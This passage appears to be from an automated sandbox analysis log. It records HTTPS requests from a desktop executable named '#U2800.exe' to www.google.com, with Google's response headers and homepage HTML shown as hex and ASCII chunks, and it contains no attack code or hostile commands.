                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC191INData Raw: 34 64 37 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65
                                                                                                                                                                                                        Data Ascii: 4d70<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74
                                                                                                                                                                                                        Data Ascii: has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_st
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 2c 35 35 39 2c 34 32 32 2c 32 33 30 2c 33 34 2c 32 32 2c 31 30 39 2c 35 31 35 2c 31 31 2c 31 32 32 34 2c 33 2c 35 36 34 2c 32 39 36 2c 32 32 37 2c 35 32 2c 31 35 32 2c 32 37 35 2c 31 2c 38 36 2c 35 30 2c 36 33 35 2c 32 2c 33 37 39 2c 32 2c 36 31 2c 31 38 30 2c 33 37 31 2c 37 30 33 2c 38 31 2c 31 34 32 2c 36 30 33 2c 36 30 2c 31 38 33 2c 39 31 35 2c 38 33 33 2c 32 35 38 2c 32 32 32 2c 38 32 2c 31 30 32 35 2c 39 37 30 2c 33 35 33 2c 31 39 34 2c 36 36 32 2c 33 34 38 2c 31 39 33 2c 33 31 37 2c 31 37 2c 33 2c 33 32 30 2c 34 36 31 2c 31 35 2c 36 37 31 2c 31 30 37 30 2c 39 31 33 2c 36 37 35 2c 31 36 39 2c 33 2c 34 31 30 2c 31 36 30 38 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 32 2c 37 32 37 2c 36 34 38 2c 33 2c 32 2c 36 2c 32 31 30 2c 35 30 30 2c 33 30 37 2c 33 33
                                                                                                                                                                                                        Data Ascii: ,559,422,230,34,22,109,515,11,1224,3,564,296,227,52,152,275,1,86,50,635,2,379,2,61,180,371,703,81,142,603,60,183,915,833,258,222,82,1025,970,353,194,662,348,193,317,17,3,320,461,15,671,1070,913,675,169,3,410,1608,1,5,4,4,4,162,727,648,3,2,6,210,500,307,33
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20
                                                                                                                                                                                                        Data Ascii: I=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72
                                                                                                                                                                                                        Data Ascii: reventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:tr
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74
                                                                                                                                                                                                        Data Ascii: eft:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacit
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77
                                                                                                                                                                                                        Data Ascii: ing-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-w
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 65 2d 68 65 69 67 68 74 3a 39 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64
                                                                                                                                                                                                        Data Ascii: e-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d
                                                                                                                                                                                                        Data Ascii: old}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72
                                                                                                                                                                                                        Data Ascii: :none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Ar


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        13192.168.2.449750142.250.185.2284436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1195INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:02 GMT
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-CmuEHxu6ozVYPBG2AN7TWw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Set-Cookie: AEC=AZ6Zc-X-6r0PwUZJVOa_6XNwdlOy4pFUHONMVCEIv8lD7xFmeqmFb9RFGjg; expires=Sun, 13-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                        Set-Cookie: NID=520=UBgwCGHpkDXUHSWDTd7LHUbjzXOBqTLYrYwLX5L_AvNJhj_-cZvWK4CMNFFZQ7vkcqDYG_A78mJWEBOw9APNZD3b4VznYoUt6Amd-tNF88JcMiivq3xoDYtZa4-Q_K8f_NxQDO17LH1uLvlXJZaF1WpEf-6Os4SRf_QMCzo3BGK4qx533aB9nJDRWzw7V1lqDgIj1Q2tSvIr4w; expires=Wed, 16-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC195INData Raw: 34 66 39 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73
                                                                                                                                                                                                        Data Ascii: 4f99<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61
                                                                                                                                                                                                        Data Ascii: many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standa
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 30 2c 31 31 35 2c 31 35 32 2c 31 33 34 2c 31 34 31 2c 31 2c 38 35 2c 36 38 36 2c 32 2c 33 2c 33 37 39 2c 32 2c 36 30 2c 31 38 31 2c 31 36 30 2c 32 30 39 2c 35 33 33 2c 31 38 39 2c 36 31 2c 31 34 32 2c 36 30 32 2c 36 31 2c 32 36 2c 31 36 37 2c 33 33 36 2c 35 37 30 2c 32 36 38 2c 35 36 34 2c 32 35 38 2c 36 35 39 2c 31 36 34 30 2c 33 35 33 2c 31 39 34 2c 33 35 33 2c 33 30 36 2c 38 34 30 2c 31 37 2c 33 2c 33 34 31 2c 33 35 36 2c 31 30 34 2c 31 37 35 38 2c 31 35 32 2c 33 39 32 2c 33 36 38 2c 35 39 34 2c 38 31 2c 31 36 39 2c 33 2c 34 31 34 2c 36 39 31 2c 35 33 32 2c 33 38 31 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 32 2c 37 32 38 2c 36 34 37 2c 33 2c 32 31 39 2c 34 39 39 2c 33 30 37 2c 33 33 33 2c 31 36 2c 31 2c 31 2c 32 2c 33 38 37 2c 36 33 32 2c 32 2c 31 2c 32
                                                                                                                                                                                                        Data Ascii: 0,115,152,134,141,1,85,686,2,3,379,2,60,181,160,209,533,189,61,142,602,61,26,167,336,570,268,564,258,659,1640,353,194,353,306,840,17,3,341,356,104,1758,152,392,368,594,81,169,3,414,691,532,381,1,5,4,4,4,162,728,647,3,219,499,307,333,16,1,1,2,387,632,2,1,2
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63
                                                                                                                                                                                                        Data Ascii: e.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(func
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69
                                                                                                                                                                                                        Data Ascii: ><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visi
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70 78 5c 30 2f 3b 72 69 67 68 74 3a 35 70 78 5c 30
                                                                                                                                                                                                        Data Ascii: -moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right:5px\0
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73
                                                                                                                                                                                                        Data Ascii: {color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://s
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74
